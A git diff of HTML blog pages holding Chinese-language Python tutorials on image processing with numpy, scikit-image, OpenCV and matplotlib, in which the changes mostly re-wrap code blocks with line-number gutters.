    y = np.fft.ifft(abfft).real[:YN]
    return y
    -
    convfft((1, 2, 3), (4, 5, 6))
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    def convfft(a, b):
    N = len(a)
    M = len(b)
    YN = N + M - 1
    FFT_N = 2 ** (int(np.log2(YN)) + 1)
    afft = np.fft.fft(a, FFT_N)
    bfft = np.fft.fft(b, FFT_N)
    abfft = afft * bfft
    y = np.fft.ifft(abfft).real[:YN]
    return y
    +
    1
    convfft((1, 2, 3), (4, 5, 6))
    array([ 4., 13., 28., 27., 18.])
     

    对比

    -
    import time
    import matplotlib.pyplot as plt

    def run(func, a, b):
    n = 1
    start = time.perf_counter()
    for j in range(n):
    func(a, b)
    end = time.perf_counter()
    run_time = end - start
    return run_time / n

    n_list = []
    t1_list = []
    t2_list = []
    for i in range(10):
    count = i * 1000 + 10
    print(count)
    a = np.ones(count)
    b = np.ones(count)
    t1 = run(conv, a, b) # 直接卷积
    t2 = run(convfft, a, b) # FFT 卷积
    n_list.append(count)
    t1_list.append(t1)
    t2_list.append(t2)

    # plot
    plt.plot(n_list, t1_list, label='conv')
    plt.plot(n_list, t2_list, label='convfft')
    plt.legend()
    plt.title(u"convolve times")
    plt.ylabel(u"run times(ms/point)")
    plt.xlabel(u"length")
    plt.show()
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    import time
    import matplotlib.pyplot as plt

    def run(func, a, b):
    n = 1
    start = time.perf_counter()
    for j in range(n):
    func(a, b)
    end = time.perf_counter()
    run_time = end - start
    return run_time / n

    n_list = []
    t1_list = []
    t2_list = []
    for i in range(10):
    count = i * 1000 + 10
    print(count)
    a = np.ones(count)
    b = np.ones(count)
    t1 = run(conv, a, b) # 直接卷积
    t2 = run(convfft, a, b) # FFT 卷积
    n_list.append(count)
    t1_list.append(t1)
    t2_list.append(t2)

    # plot
    plt.plot(n_list, t1_list, label='conv')
    plt.plot(n_list, t2_list, label='convfft')
    plt.legend()
    plt.title(u"convolve times")
    plt.ylabel(u"run times(ms/point)")
    plt.xlabel(u"length")
    plt.show()
    10
     1010
     2010
    @@ -777,6 +775,8 @@ 

    对比

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Introductory python tutorials for image processing(1-21)-Python Basics/index.html b/posts/DIP-Introductory python tutorials for image processing(1-21)-Python Basics/index.html index 852ee59ed0..006a559433 100644 --- a/posts/DIP-Introductory python tutorials for image processing(1-21)-Python Basics/index.html +++ b/posts/DIP-Introductory python tutorials for image processing(1-21)-Python Basics/index.html @@ -44,8 +44,6 @@ - - @@ -430,7 +428,7 @@

    from skimage import io, filters
    from matplotlib import pyplot as plt

    img = io.imread('images/Osteosarcoma_01_25Sigma_noise.tif') # 读取图片
    gaussian_img = filters.gaussian(img, sigma=2) # 添加高斯模糊

    plt.imshow(gaussian_img) # 显示图片
    +
    1
    2
    3
    4
    5
    6
    7
    from skimage import io, filters
    from matplotlib import pyplot as plt

    img = io.imread('images/Osteosarcoma_01_25Sigma_noise.tif') # 读取图片
    gaussian_img = filters.gaussian(img, sigma=2) # 添加高斯模糊

    plt.imshow(gaussian_img) # 显示图片

    png

    Tutorial 05 - How to install python using Anaconda

    教你怎么装 Anaconda 和 Spyder…

    @@ -488,40 +486,40 @@

    life_sciences = {'Botany': 'plants', 
    'Zoology': 'animals',
    'Virology': 'viruses',
    'Cell_biology': 'cells'}
    -
    life_sciences = dict([('Botany', 'plants'),
    ('Zoology', 'animals'),
    ('Virology', 'viruses'),
    ('Cell_biology', 'cells')])
    -
    life_sciences = dict(Botany = 'plants',
    Zoology = 'animals',
    Virology = 'viruses',
    Cell_biology='cells')
    +
    1
    2
    3
    4
    life_sciences = {'Botany': 'plants', 
    'Zoology': 'animals',
    'Virology': 'viruses',
    'Cell_biology': 'cells'}
    +
    1
    2
    3
    4
    life_sciences = dict([('Botany', 'plants'),
    ('Zoology', 'animals'),
    ('Virology', 'viruses'),
    ('Cell_biology', 'cells')])
    +
    1
    2
    3
    4
    life_sciences = dict(Botany = 'plants',
    Zoology = 'animals',
    Virology = 'viruses',
    Cell_biology='cells')
    • 判断定义变量的类型
    -
    type(life_sciences)
    +
    1
    type(life_sciences)
    dict
     
    • 查找
    -
    print('Zoology' in life_sciences)
    +
    1
    print('Zoology' in life_sciences)
    True
     
    • 添加元素
    -
    life_sciences['Neuroscience'] = 'nervous_system'
    -
    print(life_sciences)
    +
    1
    life_sciences['Neuroscience'] = 'nervous_system'
    +
    1
    print(life_sciences)
    {'Botany': 'plants', 'Zoology': 'animals', 'Virology': 'viruses', 'Cell_biology': 'cells', 'Neuroscience': 'nervous_system'}
     
    • 删除元素
    -
    del life_sciences['Neuroscience']
    -
    print(life_sciences)
    +
    1
    del life_sciences['Neuroscience']
    +
    1
    print(life_sciences)
    {'Botany': 'plants', 'Zoology': 'animals', 'Virology': 'viruses', 'Cell_biology': 'cells'}
     
    • 定义字典时只能用 tuple 作 key 而不是 list:
    -
    b = {(1, 0): 'a', (1, 1): 'b', (2, 2): 'c', (3, 2): 'd'}
    -
    c = {[1, 0]: 'a', [1, 1]: 'b', [2, 2]: 'c', [3, 2]: 'd'}
    +
    1
    b = {(1, 0): 'a', (1, 1): 'b', (2, 2): 'c', (3, 2): 'd'}
    +
    1
    c = {[1, 0]: 'a', [1, 1]: 'b', [2, 2]: 'c', [3, 2]: 'd'}
    ---------------------------------------------------------------------------
     
     TypeError                                 Traceback (most recent call last)
    @@ -535,13 +533,13 @@ 

    d = list(life_sciences.keys())
    d
    +
    1
    2
    d = list(life_sciences.keys())
    d
    ['Botany', 'Zoology', 'Virology', 'Cell_biology']
     
    • 输出字典的 value
    -
    e = list(life_sciences.values())
    e
    +
    1
    2
    e = list(life_sciences.values())
    e
    ['plants', 'animals', 'viruses', 'cells']
     

    Tutorial 15 - What are numpy arrays in Python

    @@ -549,38 +547,38 @@

    a = [1, 2, 3, 4, 5]
    b = 2 * a
    b
    +
    1
    2
    3
    a = [1, 2, 3, 4, 5]
    b = 2 * a
    b
    [1, 2, 3, 4, 5, 1, 2, 3, 4, 5]
     
    -
    type(a)
    +
    1
    type(a)
    list
     
    -
    import numpy as np

    c = np.array(a)
    d = 2 * c
    d
    +
    1
    2
    3
    4
    5
    import numpy as np

    c = np.array(a)
    d = 2 * c
    d
    array([ 2,  4,  6,  8, 10])
     
    -
    type(c)
    +
    1
    type(c)
    numpy.ndarray
     
    -
    c ** 2
    +
    1
    c ** 2
    array([ 1,  4,  9, 16, 25], dtype=int32)
     
    • 设置数据类型
    -
    import numpy as np

    x = np.array([[1, 2], [3, 4]]) # 整型变量
    y = np.array([[1, 2], [3, 4]], dtype=np.float64) # float
    y/2
    +
    1
    2
    3
    4
    5
    import numpy as np

    x = np.array([[1, 2], [3, 4]]) # 整型变量
    y = np.array([[1, 2], [3, 4]], dtype=np.float64) # float
    y/2
    array([[0.5, 1. ],
            [1.5, 2. ]])
     
    • 读取图像, 将图像存储为 numpy 矩阵
    -
    from skimage import io

    img1 = io.imread('images/Osteosarcoma_01.tif')
    type(img1)
    +
    1
    2
    3
    4
    from skimage import io

    img1 = io.imread('images/Osteosarcoma_01.tif')
    type(img1)
    numpy.ndarray
     
    • 图像(高, 宽, 通道数)
    -
    img1.shape
    +
    1
    img1.shape
    (1104, 1376, 3)
     
      @@ -590,38 +588,38 @@

      a = np.ones_like(img1)
      a.shape
      +
      1
      2
      a = np.ones_like(img1)
      a.shape
      (1104, 1376, 3)
       
      • 切片
      -
      import numpy as np

      a = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
      np.shape(a)
      +
      1
      2
      3
      4
      import numpy as np

      a = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
      np.shape(a)
      (3, 4)
       
      -
      a
      +
      1
      a
      array([[ 1,  2,  3,  4],
              [ 5,  6,  7,  8],
              [ 9, 10, 11, 12]])
       
      -
      a[:2]
      +
      1
      a[:2]
      array([[1, 2, 3, 4],
              [5, 6, 7, 8]])
       
      -
      a[:2, 1:3]
      +
      1
      a[:2, 1:3]
      array([[2, 3],
              [6, 7]])
       
      • 求和
      -
      np.sum(a, axis=0)
      +
      1
      np.sum(a, axis=0)
      array([15, 18, 21, 24])
       
      -
      np.sum(a, axis=1)
      +
      1
      np.sum(a, axis=1)
      array([10, 26, 42])
       
      -
      np.max(a)
      +
      1
      np.max(a)
      12
       

      Tutorial 16 - Data types in python

      @@ -702,12 +700,12 @@

      from skimage import io, img_as_float

      img = io.imread('images/Osteosarcoma_01.tif')
      img2 = img_as_float(img)
      +
      1
      2
      3
      4
      from skimage import io, img_as_float

      img = io.imread('images/Osteosarcoma_01.tif')
      img2 = img_as_float(img)

      png

      -
      img.max()
      +
      1
      img.max()
      255
       
      -
      img2.max()
      +
      1
      img2.max()
      1.0
       

      Tutorial 17 - if and else statements in python

      @@ -723,30 +721,30 @@

      def squared(x):
      return x ** 2
      -
      squared(4)
      +
      1
      2
      def squared(x):
      return x ** 2
      +
      1
      squared(4)
      16
       
      • lambda 函数
      -
      a = lambda x: x ** 2
      a(5)
      +
      1
      2
      a = lambda x: x ** 2
      a(5)
      25
       
      • 使用 lambda 函数
      -
      a = lambda x, y: 2 * x ** 2 + 3 * y
      a(3, 5)
      +
      1
      2
      a = lambda x, y: 2 * x ** 2 + 3 * y
      a(3, 5)
      33
       
      • lambda 函数和普通函数混合使用
      -
      # S = ut + 1 / 2 a * t ** 2

      def distance_eqn(u, a):
      return lambda t: u * t + ((1 / 2) * a * t ** 2)
      -
      dist = distance_eqn(5, 10)
      dist(20)
      +
      1
      2
      3
      4
      # S = ut + 1 / 2 a * t ** 2

      def distance_eqn(u, a):
      return lambda t: u * t + ((1 / 2) * a * t ** 2)
      +
      1
      2
      dist = distance_eqn(5, 10)
      dist(20)
      2100.0
       
      -
      distance_eqn(5, 10)(20)
      +
      1
      distance_eqn(5, 10)(20)
      2100.0
       
      @@ -4781,6 +4779,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Introductory python tutorials for image processing(22-28)-Python Libraries/index.html b/posts/DIP-Introductory python tutorials for image processing(22-28)-Python Libraries/index.html index d7d0b8c33c..3c8746eb06 100644 --- a/posts/DIP-Introductory python tutorials for image processing(22-28)-Python Libraries/index.html +++ b/posts/DIP-Introductory python tutorials for image processing(22-28)-Python Libraries/index.html @@ -44,8 +44,6 @@ - - @@ -422,28 +420,28 @@

      使用 skimage 读取图像

      -
      from skimage import io

      img = io.imread('images/Osteosarcoma_01.tif')
      img.shape # y, x, c, dtype=uint8
      +
      1
      2
      3
      4
      from skimage import io

      img = io.imread('images/Osteosarcoma_01.tif')
      img.shape # y, x, c, dtype=uint8
      (1104, 1376, 3)
       
      • 转成 float 格式
      -
      from skimage import io, img_as_float

      img2 = img_as_float(img)
      +
      1
      2
      3
      from skimage import io, img_as_float

      img2 = img_as_float(img)

      不要使用 .astype(np.float)

      -
      import numpy as np

      img3 = img.astype(np.float64)
      +
      1
      2
      3
      import numpy as np

      img3 = img.astype(np.float64)

      转换成 uint8 格式的图像

      -
      from skimage import io, img_as_ubyte

      img_8bit = img_as_ubyte(img2)
      +
      1
      2
      3
      from skimage import io, img_as_ubyte

      img_8bit = img_as_ubyte(img2)

      png

      使用 OpenCV 读取图像

      -
      import cv2

      img_cv2 = cv2.imread('images/Osteosarcoma_01.tif') # 彩色图像
      grey_img = cv2.imread('images/Osteosarcoma_01.tif', 0) # 灰度图像
      color_img = cv2.imread('images/Osteosarcoma_01.tif', 1) # 彩色图像
      img_opencv = cv2.cvtColor(color_img, cv2.COLOR_BGR2RGB) # 将图像转为 RGB 格式
      +
      1
      2
      3
      4
      5
      6
      import cv2

      img_cv2 = cv2.imread('images/Osteosarcoma_01.tif') # 彩色图像
      grey_img = cv2.imread('images/Osteosarcoma_01.tif', 0) # 灰度图像
      color_img = cv2.imread('images/Osteosarcoma_01.tif', 1) # 彩色图像
      img_opencv = cv2.cvtColor(color_img, cv2.COLOR_BGR2RGB) # 将图像转为 RGB 格式

      OpenCV 默认使用 BGR 颜色空间, skimage 默认使用 RGB 颜色空间

      png

      Tutorial 23 - Reading proprietary images in python

      • 使用 Python 读取专有图像文件
      -
      import tifffile

      img = tifffile.imread('images/Osteosarcoma_01.tif')
      -
      from skimage import io

      img2 = io.imread('images/Osteosarcoma_01.tif', as_gray=False)
      +
      1
      2
      3
      import tifffile

      img = tifffile.imread('images/Osteosarcoma_01.tif')
      +
      1
      2
      3
      from skimage import io

      img2 = io.imread('images/Osteosarcoma_01.tif', as_gray=False)
      • tif 还有 3D image 格式 和 Time series 格式

        @@ -453,86 +451,86 @@

        # Let us extract only relevant pixels, all channels in x and y
        img1 = img[0, 0, :, :, :, 0] # 分离出高, 宽, 通道

        # Next, let us extract each channel image.
        img2 = img1[0, :, :] # 第一个通道 Red
        img3 = img1[0, :, :] # 第二个通道 Green
        img4 = img1[2, :, :] # 第三个通道 Blue DAPI
        +
        1
        2
        3
        4
        5
        6
        7
        # Let us extract only relevant pixels, all channels in x and y
        img1 = img[0, 0, :, :, :, 0] # 分离出高, 宽, 通道

        # Next, let us extract each channel image.
        img2 = img1[0, :, :] # 第一个通道 Red
        img3 = img1[0, :, :] # 第二个通道 Green
        img4 = img1[2, :, :] # 第三个通道 Blue DAPI

        Tutorial 24 - Saving images from python to your local drive

        skimage

        -
        from skimage import io

        img = io.imread('images/Osteosarcoma_01.tif')
        -
        from skimage import filters

        gaussian_img = filters.gaussian(img, sigma=3) # 此时图像会变成 float 形式
        -
        io.imsave('images/exported/saved_using_skimage.jpg', gaussian_img)
        +
        1
        2
        3
        from skimage import io

        img = io.imread('images/Osteosarcoma_01.tif')
        +
        1
        2
        3
        from skimage import filters

        gaussian_img = filters.gaussian(img, sigma=3) # 此时图像会变成 float 形式
        +
        1
        io.imsave('images/exported/saved_using_skimage.jpg', gaussian_img)
        Lossy conversion from float64 to uint8. Range [0, 1]. Convert image to uint8 prior to saving to suppress this warning.
         
        -
        io.imsave('images/exported/saved_using_skimage.tif', gaussian_img)  # 打不开, 因为识别不出 float 格式的颜色
        -
        from skimage import img_as_ubyte

        gaussian_img_8bit = img_as_ubyte(gaussian_img)
        io.imsave('images/exported/saved_using_skimage_8bit.tif', gaussian_img_8bit) # 此时可以打开
        +
        1
        io.imsave('images/exported/saved_using_skimage.tif', gaussian_img)  # 打不开, 因为识别不出 float 格式的颜色
        +
        1
        2
        3
        4
        from skimage import img_as_ubyte

        gaussian_img_8bit = img_as_ubyte(gaussian_img)
        io.imsave('images/exported/saved_using_skimage_8bit.tif', gaussian_img_8bit) # 此时可以打开

        OpenCV

        -
        import cv2

        # OpenCV 并不会将浮点数映射到 0-255 之间, 而是直接取整, 所以会显示黑色的图片
        cv2.imwrite('images/exported/saved_using_opencv.jpg', gaussian_img)
        +
        1
        2
        3
        4
        import cv2

        # OpenCV 并不会将浮点数映射到 0-255 之间, 而是直接取整, 所以会显示黑色的图片
        cv2.imwrite('images/exported/saved_using_opencv.jpg', gaussian_img)
        True
         
        -
        # OpenCV 默认输出 BGR 颜色模型, 如果直接输出, 颜色会有变化
        cv2.imwrite('images/exported/saved_using_opencv_8bit.jpg', gaussian_img_8bit)
        +
        1
        2
        # OpenCV 默认输出 BGR 颜色模型, 如果直接输出, 颜色会有变化
        cv2.imwrite('images/exported/saved_using_opencv_8bit.jpg', gaussian_img_8bit)
        True
         
        -
        # 预处理后再输出
        gaussian_img_8bit_RGB = cv2.cvtColor(gaussian_img_8bit, cv2.COLOR_BGR2RGB)
        cv2.imwrite('images/exported/saved_using_opencv_8bit_RGB.jpg', gaussian_img_8bit_RGB)
        +
        1
        2
        3
        # 预处理后再输出
        gaussian_img_8bit_RGB = cv2.cvtColor(gaussian_img_8bit, cv2.COLOR_BGR2RGB)
        cv2.imwrite('images/exported/saved_using_opencv_8bit_RGB.jpg', gaussian_img_8bit_RGB)
        True
         

        matplotlib

        -
        from matplotlib import pyplot as plt

        plt.imsave('images/exported/saved_using_pyplot.jpg', gaussian_img)
        +
        1
        2
        3
        from matplotlib import pyplot as plt

        plt.imsave('images/exported/saved_using_pyplot.jpg', gaussian_img)

        tifffile

        -
        import tifffile

        tifffile.imwrite('images/exported/saved_using_tifffile.tiff', gaussian_img)
        +
        1
        2
        3
        import tifffile

        tifffile.imwrite('images/exported/saved_using_tifffile.tiff', gaussian_img)

        png

        Tutorial 25 - Viewing 2d images in python

        matplotlib

        -
        from skimage import io

        img = io.imread('images/Osteosarcoma_01.tif')

        io.imshow(img)
        +
        1
        2
        3
        4
        5
        from skimage import io

        img = io.imread('images/Osteosarcoma_01.tif')

        io.imshow(img)
        <matplotlib.image.AxesImage at 0x1d668f31a08>
         

        png

        -
        import matplotlib.pyplot as plt

        plt.imshow(img)
        +
        1
        2
        3
        import matplotlib.pyplot as plt

        plt.imshow(img)
        <matplotlib.image.AxesImage at 0x1d66951bbc8>
         

        png

        cmap: 用多种风格显示灰度图像:

        pyplot cmap 颜色 - 知乎 (zhihu.com)

        png

        -
        img_gray = io.imread('images/Osteosarcoma_01.tif', as_gray=True)
        -
        plt.imshow(img_gray, cmap='hot')
        +
        1
        img_gray = io.imread('images/Osteosarcoma_01.tif', as_gray=True)
        +
        1
        plt.imshow(img_gray, cmap='hot')
        <matplotlib.image.AxesImage at 0x1d6698518c8>
         

        png

        -
        plt.imshow(img_gray, cmap='jet')
        +
        1
        plt.imshow(img_gray, cmap='jet')
        <matplotlib.image.AxesImage at 0x1d6698c9948>
         

        png

        -
        plt.imshow(img_gray, cmap='Blues')
        +
        1
        plt.imshow(img_gray, cmap='Blues')
        <matplotlib.image.AxesImage at 0x1d66b5018c8>
         

        png

        -
        fig = plt.figure(figsize=(10, 10))

        ax1 = fig.add_subplot(2,2,1)
        ax1.imshow(img_gray, cmap='hot')
        ax1.title.set_text('1st')

        ax2 = fig.add_subplot(2,2,2)
        ax2.imshow(img_gray, cmap='jet')
        ax2.title.set_text('2nd')

        ax3 = fig.add_subplot(2,2,3)
        ax3.imshow(img_gray, cmap='gray')
        ax3.title.set_text('3rd')

        ax4 = fig.add_subplot(2,2,4)
        ax4.imshow(img_gray, cmap='nipy_spectral')
        ax4.title.set_text('4th')
        plt.show()
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        fig = plt.figure(figsize=(10, 10))

        ax1 = fig.add_subplot(2,2,1)
        ax1.imshow(img_gray, cmap='hot')
        ax1.title.set_text('1st')

        ax2 = fig.add_subplot(2,2,2)
        ax2.imshow(img_gray, cmap='jet')
        ax2.title.set_text('2nd')

        ax3 = fig.add_subplot(2,2,3)
        ax3.imshow(img_gray, cmap='gray')
        ax3.title.set_text('3rd')

        ax4 = fig.add_subplot(2,2,4)
        ax4.imshow(img_gray, cmap='nipy_spectral')
        ax4.title.set_text('4th')
        plt.show()

        png

        OpenCV

        -
        import cv2

        gray_img = cv2.imread("images/Osteosarcoma_01.tif", 0)
        color_img = cv2.imread("images/Osteosarcoma_01.tif", 1)

        # Use the function cv2.imshow() to display an image in a window.
        # First argument is the window name which is a string. second argument is our image.

        cv2.imshow("pic from skimage import", img) # Shows weird colors as R and B channels are swapped
        cv2.imshow("color pic from opencv", color_img)
        cv2.imshow("gray pic from opencv", gray_img)

        # Maintain output window until
        # user presses a key or 1000ms (1s)
        cv2.waitKey(0)

        # destroys all windows created
        cv2.destroyAllWindows()
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        import cv2

        gray_img = cv2.imread("images/Osteosarcoma_01.tif", 0)
        color_img = cv2.imread("images/Osteosarcoma_01.tif", 1)

        # Use the function cv2.imshow() to display an image in a window.
        # First argument is the window name which is a string. second argument is our image.

        cv2.imshow("pic from skimage import", img) # Shows weird colors as R and B channels are swapped
        cv2.imshow("color pic from opencv", color_img)
        cv2.imshow("gray pic from opencv", gray_img)

        # Maintain output window until
        # user presses a key or 1000ms (1s)
        cv2.waitKey(0)

        # destroys all windows created
        cv2.destroyAllWindows()

        png

        Tutorial 26 - Basic plotting in python using matplot.pyplot

        教你怎么用 matplotlib 库

        • 画折线图
        -
        from matplotlib import pyplot as plt

        x = [1, 2, 3, 4, 5]
        y = [1, 4, 9, 16, 25]

        plt.plot(x, y)
        +
        1
        2
        3
        4
        5
        6
        from matplotlib import pyplot as plt

        x = [1, 2, 3, 4, 5]
        y = [1, 4, 9, 16, 25]

        plt.plot(x, y)
        [<matplotlib.lines.Line2D at 0x22168454048>]
         

        png

        -
        import numpy as np

        a = np.array(x)
        b = np.array(y)
        plt.plot(a, b)
        +
        1
        2
        3
        4
        5
        import numpy as np

        a = np.array(x)
        b = np.array(y)
        plt.plot(a, b)
        [<matplotlib.lines.Line2D at 0x22168e11148>]
         

        png

        • 显示图片
        -
        import cv2

        gray_img = cv2.imread('images/sandstone.tif', 0)

        plt.imshow(gray_img, cmap='gray')
        +
        1
        2
        3
        4
        5
        import cv2

        gray_img = cv2.imread('images/sandstone.tif', 0)

        plt.imshow(gray_img, cmap='gray')
        <matplotlib.image.AxesImage at 0x2216b0b5908>
         

        png

        • 显示直方图
        -
        plt.hist(gray_img.flat, bins=100, range=(0, 150))
        +
        1
        plt.hist(gray_img.flat, bins=100, range=(0, 150))
        (array([  544.,    30.,    99.,    71.,   122.,    74.,   183.,    88.,
                   274.,   170.,   394.,   253.,   594.,   341.,   806.,   507.,
                  1145.,   626.,  1431.,   794.,  1808.,  1001.,  2091.,  1062.,
        @@ -564,28 +562,28 @@ 

        from matplotlib import pyplot as plt
        import numpy as np

        a = np.array([1, 2, 3, 4, 5])
        b = np.array([1, 4, 9, 16, 25])

        plt.plot(a, b, 'r--')
        plt.axis([0, 6, 0, 50])
        +
        1
        2
        3
        4
        5
        6
        7
        8
        from matplotlib import pyplot as plt
        import numpy as np

        a = np.array([1, 2, 3, 4, 5])
        b = np.array([1, 4, 9, 16, 25])

        plt.plot(a, b, 'r--')
        plt.axis([0, 6, 0, 50])
        (0.0, 6.0, 0.0, 50.0)
         

        png

        • 多种图形
        -
        from matplotlib import pyplot as plt

        wells = ['well1', 'well2', 'well3', 'well4', 'well5']
        cells = [80, 62, 88, 110, 90]

        plt.bar(wells, cells) # 条形图
        plt.scatter(wells, cells) # 散点图
        plt.plot(wells, cells) # 折线图
        +
        1
        2
        3
        4
        5
        6
        7
        8
        from matplotlib import pyplot as plt

        wells = ['well1', 'well2', 'well3', 'well4', 'well5']
        cells = [80, 62, 88, 110, 90]

        plt.bar(wells, cells) # 条形图
        plt.scatter(wells, cells) # 散点图
        plt.plot(wells, cells) # 折线图
        [<matplotlib.lines.Line2D at 0x2216c346dc8>]
         

        png

        -
        from matplotlib import pyplot as plt

        # Adding labels and annotations
        wells = [1,2,3,4,5]
        cells = [80, 62, 88, 110, 90]

        plt.figure(figsize=(8, 8))
        plt.bar(wells, cells)
        plt.xlabel('Well #', fontsize=18, color='red')
        plt.ylabel('# dead cells')
        plt.title('Dead cells in each well')
        plt.axis([1, 6, 60, 120]) #xmin, xmax, ymin, ymax
        plt.grid(True) # 显示网格
        plt.show()
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        from matplotlib import pyplot as plt

        # Adding labels and annotations
        wells = [1,2,3,4,5]
        cells = [80, 62, 88, 110, 90]

        plt.figure(figsize=(8, 8))
        plt.bar(wells, cells)
        plt.xlabel('Well #', fontsize=18, color='red')
        plt.ylabel('# dead cells')
        plt.title('Dead cells in each well')
        plt.axis([1, 6, 60, 120]) #xmin, xmax, ymin, ymax
        plt.grid(True) # 显示网格
        plt.show()

        png

        • 更改坐标轴单位
        -
        from matplotlib import pyplot as plt

        x = [1,2,3,4,5]
        y = [10, 125, 1350, 11250, 100500]

        plt.figure(figsize=(12, 6))

        # linear
        plt.subplot(121)
        plt.plot(x, y)
        plt.yscale('linear')
        plt.title('linear')
        plt.grid(True)

        #Log
        plt.subplot(122)
        plt.plot(x, y)
        plt.yscale('log')
        plt.title('log')
        plt.grid(True)
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        from matplotlib import pyplot as plt

        x = [1,2,3,4,5]
        y = [10, 125, 1350, 11250, 100500]

        plt.figure(figsize=(12, 6))

        # linear
        plt.subplot(121)
        plt.plot(x, y)
        plt.yscale('linear')
        plt.title('linear')
        plt.grid(True)

        #Log
        plt.subplot(122)
        plt.plot(x, y)
        plt.yscale('log')
        plt.title('log')
        plt.grid(True)

        png

        • 显示多幅图片
        -
         from matplotlib import pyplot as plt

        wells = ['well1', 'well2', 'well3', 'well4', 'well5']
        cells = [80, 62, 88, 110, 90]


        #Initialize the plot and sublots
        # Initialize the plot
        fig = plt.figure(figsize=(16,6))
        ax1 = fig.add_subplot(131)
        ax1.set(title='vertical bar', xlabel='Well #', ylabel='# cells')

        ax2 = fig.add_subplot(132)
        ax1.set(title='horizontal bar', xlabel='Well #', ylabel='# cells')

        ax3 = fig.add_subplot(133)

        # Plot the data
        ax1.bar(wells, cells)
        ax2.barh(wells, cells)
        ax3.plot(wells, cells)

        plt.savefig("images/my_plot.jpg") # Save plot
        # Show the plot
        plt.show()
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
         from matplotlib import pyplot as plt

        wells = ['well1', 'well2', 'well3', 'well4', 'well5']
        cells = [80, 62, 88, 110, 90]


        #Initialize the plot and sublots
        # Initialize the plot
        fig = plt.figure(figsize=(16,6))
        ax1 = fig.add_subplot(131)
        ax1.set(title='vertical bar', xlabel='Well #', ylabel='# cells')

        ax2 = fig.add_subplot(132)
        ax1.set(title='horizontal bar', xlabel='Well #', ylabel='# cells')

        ax3 = fig.add_subplot(133)

        # Plot the data
        ax1.bar(wells, cells)
        ax2.barh(wells, cells)
        ax3.plot(wells, cells)

        plt.savefig("images/my_plot.jpg") # Save plot
        # Show the plot
        plt.show()

        png

        Tutorial 27 - Using glob to read multiple files in python

        Python 模块之 glob 模块 - 知乎

        @@ -593,7 +591,7 @@

      • 一次性得到整个列表
      -
      import cv2
      import glob

      file_list = glob.glob('images/*.*')
      file_list
      +
      1
      2
      3
      4
      5
      import cv2
      import glob

      file_list = glob.glob('images/*.*')
      file_list
      ['images\\Alloy_gradient.jpg',
        'images\\BSE.tif',
        'images\\bubbles.tif',
      @@ -621,7 +619,7 @@ 

    • 通过 for 循环得到列表
    -
    my_list = []
    path = 'images/*.*'
    for file in glob.glob(path):
    print(file)
    a = cv2.imread(file)
    my_list.append(a)
    +
    1
    2
    3
    4
    5
    6
    my_list = []
    path = 'images/*.*'
    for file in glob.glob(path):
    print(file)
    a = cv2.imread(file)
    my_list.append(a)
    images\Alloy_gradient.jpg
     images\BSE.tif
     images\bubbles.tif
    @@ -650,7 +648,7 @@ 

  6. 使用 os.listdir
  7. -
    import os

    path = 'images/'
    print(os.listdir(path))

    for image in os.listdir(path):
    print(image)
    +
    1
    2
    3
    4
    5
    6
    7
    import os

    path = 'images/'
    print(os.listdir(path))

    for image in os.listdir(path):
    print(image)
    ['Alloy_gradient.jpg', 'BSE.tif', 'bubbles.tif', 'cast_iron1.tif', 'cast_iron2.jpg', 'exported', 'monalisa.jpg', 'Osteosarcoma_01.tif', 'Osteosarcoma_01_1sigma_blur.tif', 'Osteosarcoma_01_25Sigma_noise.tif', 'Osteosarcoma_01_2sigma_blur.tif', 'Osteosarcoma_01_8bit.ome.tiff', 'Osteosarcoma_01_8bit_salt_pepper.tif', 'Osteosarcoma_01_8bit_salt_pepper_cropped.tif', 'Osteosarcoma_01_small.tif', 'Osteosarcoma_01_transl.tif', 'Osteosarcoma_01_transl_rot.tif', 'sandstone.tif', 'sandstone_blur_2sigma.tif', 'sandstone_low_contrast.tif', 'scratch_time_series.tif', 'synthetic.jpg', 'Ti_powder.tif', 'Ti_powder_single.tif']
     Alloy_gradient.jpg
     BSE.tif
    @@ -680,7 +678,7 @@ 

  8. 使用 os.walk 遍历文件
  9. -
    import os

    print(os.walk('.')) # Nothing to see here as this is just a generator

    for root, dirs, files in os.walk('.'):
    # root 表示当前正在访问的文件夹路径
    # dirs 表示该文件夹下的子目录名 list
    # files 表示该文件夹下的文件 list
    # 遍历文件
    for f in files:
    print(os.path.join(root, f))
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import os

    print(os.walk('.')) # Nothing to see here as this is just a generator

    for root, dirs, files in os.walk('.'):
    # root 表示当前正在访问的文件夹路径
    # dirs 表示该文件夹下的子目录名 list
    # files 表示该文件夹下的文件 list
    # 遍历文件
    for f in files:
    print(os.path.join(root, f))
    <generator object walk at 0x000001AAF06408C8>
     .\4.ipynb
     .\Untitled.ipynb
    @@ -740,7 +738,7 @@ 

  10. 使用 os.walk 遍历文件夹
  11. -
    import os

    print(os.walk('.')) # Nothing to see here as this is just a generator

    for root, dirs, files in os.walk('.'):
    # root 表示当前正在访问的文件夹路径
    # dirs 表示该文件夹下的子目录名 list
    # files 表示该文件夹下的文件 list
    # 遍历所有的文件夹
    for d in dirs:
    print(os.path.join(root, d))
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import os

    print(os.walk('.')) # Nothing to see here as this is just a generator

    for root, dirs, files in os.walk('.'):
    # root 表示当前正在访问的文件夹路径
    # dirs 表示该文件夹下的子目录名 list
    # files 表示该文件夹下的文件 list
